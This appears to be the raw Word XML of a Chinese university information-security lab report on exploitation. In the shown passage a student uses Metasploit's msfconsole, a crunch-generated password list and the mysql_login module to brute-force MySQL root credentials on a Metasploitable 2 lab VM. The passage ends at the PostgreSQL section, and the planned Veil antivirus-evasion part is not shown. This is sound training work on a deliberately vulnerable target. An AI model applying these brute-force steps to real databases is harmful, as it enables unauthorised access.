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A5A47" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:afterLines="100" w:after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北京科技大学实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31661901" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>学院：计算机与通信工程学院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>专业：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信息安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>班级：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信安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">192          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DA1295" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:beforeLines="100" w:before="312" w:afterLines="100" w:after="312" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420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霍炟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>学号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">41824147       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验日期：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D07A217" w14:textId="695B3739" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before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实验名称：</w:t>
      </w:r>
      <w:r w:rsidR="00D320F7" w:rsidRPr="00D320F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E21C88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实验目的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794A9475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D77CDD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cstheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.使用MSFCONSOLE工具渗透攻击Metasploitable MySQL数据库服务、PostgreSQL数据库服务、Tomcat服务和PDF文件等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2E4716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</w:p>
    <w:p w14:paraId="1CDAB580" w14:textId="3369F720" w:rsidR="00D77CDD" w:rsidRPr="003123BF" w:rsidRDefault="00D77CDD" w:rsidP="00D77CDD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D77CDD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cstheme="majorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.使用免杀工具Veil渗透win7虚拟机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A183D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实验仪器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF04953" w14:textId="77777777" w:rsidR="003123BF" w:rsidRPr="003123BF" w:rsidRDefault="003123BF" w:rsidP="003123BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003123BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>希冀平台</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3039AFAC" w14:textId="77777777" w:rsidR="003123BF" w:rsidRPr="003123BF" w:rsidRDefault="003123BF" w:rsidP="003123BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003123BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Linux kali 5.4.0-kali3-amd54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A30A06C" w14:textId="30152E01" w:rsidR="00A048C5" w:rsidRPr="000D1721" w:rsidRDefault="003123BF" w:rsidP="003123BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003123BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable 2 虚拟机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268714EB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实验原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2283BB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 w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>漏洞利用是获得系统控制权限的重要途径。用户从目标系统中找到容易攻击的漏洞，然后利用该漏洞获取权限，从而实现对目标系统的控制。为了便于用户练习，本章将介绍</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77CDD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit发布的Metasploitable 2。用户可以将其作为练习用的Linux操作系统。本章将利用Metasploitable系统上存在的漏洞，介绍各种渗透攻击，如MySQL数据库、PostgreSQL数据库及Tomcat服务等，其主要知识点如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20246B89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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable操作系统；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303E2F00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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Metasploit基础；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9DF0BC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 w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77CDD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Meterpreter；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32293F0E" w14:textId="77777777" w:rsidR="00D77CDD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 w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>渗透攻击应用；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239313ED" w14:textId="7364BEFE" w:rsidR="00A048C5" w:rsidRPr="00D77CDD" w:rsidRDefault="00D77CDD" w:rsidP="00D77CD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77CDD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>免杀</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77CDD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Payload生成工具Veil。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7037E6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实验内容与步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D86390E" w14:textId="3F0A7D1A" w:rsidR="00A048C5" w:rsidRDefault="003123BF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123BF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>打开桌面</w:t>
      </w:r>
      <w:r w:rsidRPr="003123BF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Virtual Machine，选择kali-linux虚拟机进入实验环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106E1E9F" w14:textId="6B997ADF" w:rsidR="003123BF" w:rsidRDefault="003123BF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9969AE6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Metasploitable是一款基于Ubuntu Linux的操作系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C122A7" w14:textId="77777777" w:rsidR="00126DCB" w:rsidRPr="00126DCB" w:rsidRDefault="00126DCB" w:rsidP="00126DCB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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. 安装Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395B23E1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该系统是一个虚拟机文件，从</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00126DCB">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>这里</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="787C45F4" w14:textId="77777777" w:rsidR="00126DCB" w:rsidRPr="00126DCB" w:rsidRDefault="00F907F5" w:rsidP="00126DCB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8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00126DCB" w:rsidRPr="00126DCB">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://sourceforge.net/projects/metasploitable/files/Metasploitable2/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52948BF7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网站下载解压之后可以直接使用，无需安装。由于基于Ubuntu，所以Metasploitable使用起来十分得心应手。Metasploitable就是用来作为攻击用的靶机，所以它存在大量未打补丁漏洞，并且开放了无数高危端口。本节将介绍安Metasploitable虚拟机的使用。 安装Metasploitable 2的具体操作步骤如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA52FB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1）下载Metasploitables 2，其文件名为Metasploitable-Linux-2.0.0.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DE2F44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2）将下载的文件解压到本地磁盘。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C81381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3）使用virtual machine manager安装虚拟机即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A10080" w14:textId="0692A94A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F2042A" wp14:editId="6B4D1104">
            <wp:extent cx="5274310" cy="2085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F0A9" w14:textId="77777777" w:rsidR="00126DCB" w:rsidRPr="00126DCB" w:rsidRDefault="00126DCB" w:rsidP="00126DC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26DCB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable虚拟机的用户密码都为： msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0BB74B" w14:textId="443F86A9" w:rsidR="003123BF" w:rsidRDefault="003123BF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41DDED4" w14:textId="6ECC6D81" w:rsidR="00126DCB" w:rsidRDefault="00126DCB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1513EBB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etasploit是一款开源的安全漏洞检测工具。它可以帮助用户识别安全问题，验证漏洞的缓解措施，并对某些软件进行安全性评估，提供真正的安全风险情报。当用户第一次接触Metasploit渗透测试框架软件（MSF）时，可能会被它提供如此多的接口、选项、变量和模块所震撼，而感觉无所适从。Metasploit软件为它的基础功能提供了多个用户接口，包括终端、命令行和图形化界面等。本节将介绍Metasploit下各种接口的使用方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E07762" w14:textId="77777777" w:rsidR="001717F1" w:rsidRPr="001717F1" w:rsidRDefault="001717F1" w:rsidP="001717F1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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Metasploit的图形管理工具Armitage (暂不能使用)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2250B036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Armitage组件是Metasploit框架中一个完全交互式的图形化用户接口，由Raphael Mudge所开发。Armitage工具包含Metasploit控制台，通过使用其标签特性，用户可以看到多个Metasploit控制台或多个Meterpreter会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C84D7A5" w14:textId="77777777" w:rsidR="001717F1" w:rsidRPr="001717F1" w:rsidRDefault="001717F1" w:rsidP="001717F1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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. 控制Metasploit终端（MSFCONSOLE）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F51881E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SF终端（MSFCONSOLE）是目前Metasploit框架最为流行的用户接口，而且也是非常灵活的。因为MSF终端是Metasploit框架中最灵活、功能最丰富及支持最好的工具之一。MSFCONSOLE主要用于管理Metasploit数据库，管理会话、配置并启动Metasploit模块。本质上来说，就是为了利用漏洞，MSFCONSOLE将获取用户连接到主机的信息，以至于用户能启动渗透攻击目标系统。本小节将介绍Metasploit终端（MSFCONSOLE）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DFC30F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打开Kali-Linux虚拟机，进入虚拟环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044B0054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当使用Metasploit控制台时，用户将使用一些通用的命令，如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C583CE1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help：该命令允许用户查看执行命令的帮助信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70245D93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use module：该命令允许用户加载选择的模块。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E26C870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set optionname module：该命令允许用户为模块设置不同的选项。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E44A39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run：该命令用来启动一个非渗透攻击模块。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01006F3C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search module：该命令允许用户搜索一个特定的模块。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B81476" w14:textId="77777777" w:rsidR="001717F1" w:rsidRPr="001717F1" w:rsidRDefault="001717F1" w:rsidP="001717F1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exit：该命令允许用户退出MSFCONSOLE。 MSFCONSOLE漏洞利用的具体操作步骤如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F5A72C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lastRenderedPageBreak/>
        <w:t>1）在Kali-Linux终端启动MSFCONSOLE，执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231AF9B9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[email protected]:~# msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEAE8E9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执行以上命令后，输出信息如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF62BC4" w14:textId="53CE21CD" w:rsidR="001717F1" w:rsidRPr="001717F1" w:rsidRDefault="00A169D0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169D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5F3887F" wp14:editId="51A8F06E">
            <wp:extent cx="5274310" cy="34531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DCC4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输出的信息出现msf&gt;提示符，表示登录MSFCONSOLE成功。此时就可以在该命令行运行其他任何命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C970785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2）使用search命令搜索所有有效的Linux模块。对于模块用户每次想要执行一个动作，这是一个很好的主意。主要原因是Metasploit各种版本之间，模块的路径可能有改变。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29085BA0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msf5&gt; search linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AFC897" w14:textId="5255E4B6" w:rsidR="001717F1" w:rsidRPr="001717F1" w:rsidRDefault="00654278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427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4340B09" wp14:editId="20892A5F">
            <wp:extent cx="5274310" cy="36264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CED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输出的信息就是Metasploit中所有有效的模块。输出的信息显示为4列，分别表示模块名称、公开时间、等级及描述。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F5824C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3）使用John Ripper linux密码破解模块。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F945B0E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msf5 &gt; use auxiliary/analyze/jtr_linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1975D978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msf5 auxiliary(jtr_linux) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59248F9B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显示原来的John Ripper linux密码破解模块已经被移除了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA6244B" w14:textId="55D08F23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151B84" wp14:editId="258E0E8A">
            <wp:extent cx="5274310" cy="8426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3C2C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4）查看模块的有效选项。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D01F2D" w14:textId="03750ADA" w:rsidR="001717F1" w:rsidRPr="001717F1" w:rsidRDefault="00654278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427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C2E1102" wp14:editId="6922C8C3">
            <wp:extent cx="5274310" cy="37839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EE38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5）用户能设置独特的选项，现在用户有一个选项的列表，这些选项为运行crack_Linux，使用set命令。设置JOHN_PATH选项，如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E7C844" w14:textId="5D4C6F82" w:rsidR="001717F1" w:rsidRPr="001717F1" w:rsidRDefault="00E43C96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43C9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5EABA9" wp14:editId="3C02BD4A">
            <wp:extent cx="5274310" cy="36595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9E17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6）现在运行渗透攻击，执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8F9379" w14:textId="50249FDE" w:rsid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lastRenderedPageBreak/>
        <w:t>msf auxiliary(jtr_linux) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2815D547" w14:textId="53CFDEFE" w:rsidR="00E43C96" w:rsidRPr="001717F1" w:rsidRDefault="00E43C96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43C9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AAA637" wp14:editId="2107CF3B">
            <wp:extent cx="5274310" cy="41338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EDD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这里只是暂时讲解msfconsole的大致渗透攻击流程，详细的实验步骤后面几节会有讲解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BEC8F6" w14:textId="77777777" w:rsidR="001717F1" w:rsidRPr="001717F1" w:rsidRDefault="001717F1" w:rsidP="001717F1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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. 控制Metasploit命令行接口（MSFCLI）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46305372" w14:textId="77777777" w:rsidR="001717F1" w:rsidRPr="001717F1" w:rsidRDefault="001717F1" w:rsidP="001717F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717F1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfcli 不能使用，在新版metasploit不再有效，推荐使用msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3391D065" w14:textId="67825148" w:rsidR="00126DCB" w:rsidRDefault="00126DCB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D7513C5" w14:textId="5F843386" w:rsidR="001717F1" w:rsidRDefault="001717F1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21D140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前面依次介绍了Armitage、MSFCONSOLE和MSFCLI接口的概念及使用。本节将介绍使用MSFCONSOLE工具渗透攻击MySQL数据库服务、PostgreSQL数据库服务、Tomcat服务和PDF文件等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0096C6D6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1. 渗透攻击MySQL数据库服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3356B53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MySQL是一个关系型数据库管理系统，由瑞典MySQL AB公司开发，目前属于Oracle公司。在Metasploitable系统中，MySQL的身份认证存在漏洞。该漏洞有可能会让潜在的攻击者不必提供正确的身份证书便可访问MySQL数据库。所以，用户可以利用该漏洞，对MySQL服务进行渗透攻击。恰好Metasploit框架</w:t>
      </w:r>
      <w:r w:rsidRPr="005C53F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>提供了一套针对MySQL数据库的辅助模块，可以帮助用户更有效的进行渗透测试。本小节将介绍使用Metasploit的MySQL扫描模块渗透攻击MySQL数据库服务。渗透攻击Metasploitable系统中MySQL数据库服务的具体操作步骤如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2073D98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1）启动MSFCONSOLE。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176CD265" w14:textId="265A33DF" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="00AD1D6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D1D6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84AD81" wp14:editId="41D5231F">
            <wp:extent cx="5274310" cy="43548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2D51" w14:textId="3DE5EDB2" w:rsid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2）扫描所有有效的MySQL模块。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DCAD11" w14:textId="1BAFB6AE" w:rsidR="00AD1D63" w:rsidRPr="005C53F9" w:rsidRDefault="00AA2CF8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2CF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EFFEDFA" wp14:editId="282C0403">
            <wp:extent cx="5274310" cy="40709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5C9A" w14:textId="3484DEA2" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="00AD1D6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D1D6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5DCD0F" wp14:editId="09E1FE50">
            <wp:extent cx="5274310" cy="40309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568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输出的信息显示了MySQL上可用的模块。从这些模块中，选择渗透攻击的模</w:t>
      </w:r>
      <w:r w:rsidRPr="005C53F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>块进行攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A00017" w14:textId="77777777" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="005C53F9" w:rsidP="005C53F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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这里使用MySQL扫描模块。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02305ABC" w14:textId="30B0D01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41592C0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4）显示模块的有效选项。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAB88ED" w14:textId="77A13FE4" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="00C3225E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3225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1CF8D4" wp14:editId="1C0BCCFA">
            <wp:extent cx="5274310" cy="48653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A6E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的信息显示了在mysql_login模块下可设置的选项。从输出的结果中可以看到显示了四列信息，分别是选项名称、当前设置、需求及描述。其中Required为yes的选项是必须配置的，反之可以不用配置。对于选项的作用，Description都有相应的介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31004F6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5）为渗透攻击指定目标系统、用户文件和密码文件的位置。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F2E79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crunch 1 6 123\ &gt;&gt; password.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AAE558" w14:textId="0BC346E6" w:rsid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这里表示使用crunch工具生成 1 位到 6位数 由 1、2、3和空格（\ 代表空格）排列组合成的密码字典。并且保存在当前路径下的password.txt文件当</w:t>
      </w:r>
      <w:r w:rsidRPr="005C53F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D83A23F" w14:textId="7AFC8853" w:rsidR="00C3225E" w:rsidRPr="005C53F9" w:rsidRDefault="00C3225E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3225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06D788" wp14:editId="33EE4CEF">
            <wp:extent cx="5274310" cy="42767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2D05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这里推荐一些常用的用户文件和密码文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632500AA" w14:textId="77777777" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="00F907F5" w:rsidP="005C53F9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hyperlink r:id="rId21" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="005C53F9" w:rsidRPr="005C53F9">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://github.com/arthur0081/Blasting_dictionary</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D977086" w14:textId="5AF5F19B" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="009B4B3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B4B3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42BCDF" wp14:editId="29C76F67">
            <wp:extent cx="5274310" cy="39865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455" w14:textId="04C96C87" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="009B4B3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B4B3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551F21" wp14:editId="6397A831">
            <wp:extent cx="5274310" cy="25787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CEC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以上信息设置了目标系统的地址，用户文件和密码文件的路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9D53DC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参数解析：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A6DA3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RHOSTS 为目标靶机（远端主机地址）。 这里我们的目标靶机为metasploitable，首先在环境当中打开metasploitable虚拟机，用户密码皆为msfadmin,进入虚拟机环境，使用ip addr 命令即可查看metasploitable的ip地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390D574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lastRenderedPageBreak/>
        <w:t>这里的用户名文件和密码字典使用crunch工具自行创建，或者使用在上述提供的网址去下载常用的密码本文件。crunch工具的使用方法在后面的章节会有详细讲解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDA119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这里我们只选择破解了metasploitable上MySQL数据库root用户的登录密码，也可以选择使用用户名文件来破解mysql上多个用户的登录密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE19CA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6）启动渗透攻击。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19449C59" w14:textId="4536D4F3" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="008F7B9F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F7B9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944FE8" wp14:editId="297EBF91">
            <wp:extent cx="5274310" cy="42284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D3C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在这里我们可以看见RHOTS为192.168.122.117：3306上使用‘root：’登录成功，表面这里root用户的密码为空。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377F6424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渗透成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3193D1" w14:textId="77777777" w:rsidR="005C53F9" w:rsidRPr="005C53F9" w:rsidRDefault="00F907F5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1CD142B8">
          <v:rect id="_x0000_i1025" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#333" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6200917D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2. 渗透攻击PostgreSQL数据库服务</w:t>
      </w:r>
    </w:p>
